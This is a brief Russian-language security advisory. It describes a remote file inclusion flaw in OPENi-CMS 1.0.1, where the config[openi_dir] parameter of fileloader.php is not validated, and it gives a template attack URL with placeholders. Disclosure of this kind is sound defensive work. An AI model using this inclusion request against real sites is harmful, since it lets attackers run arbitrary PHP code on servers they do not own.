Программа: OPENi-CMS 1.0.1 

Обнаруженная уязвимость позволяет скомпрометировать уязвимую систему.
Сценарий openi-admin/base/fileloader.php недостаточно проверяет параметр «config[openi_dir]» перед включением файлов. В результате можно включить и выполнить произвольный PHP код с внутренних или внешних источников. 

Пример:

http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]



Оставить мнение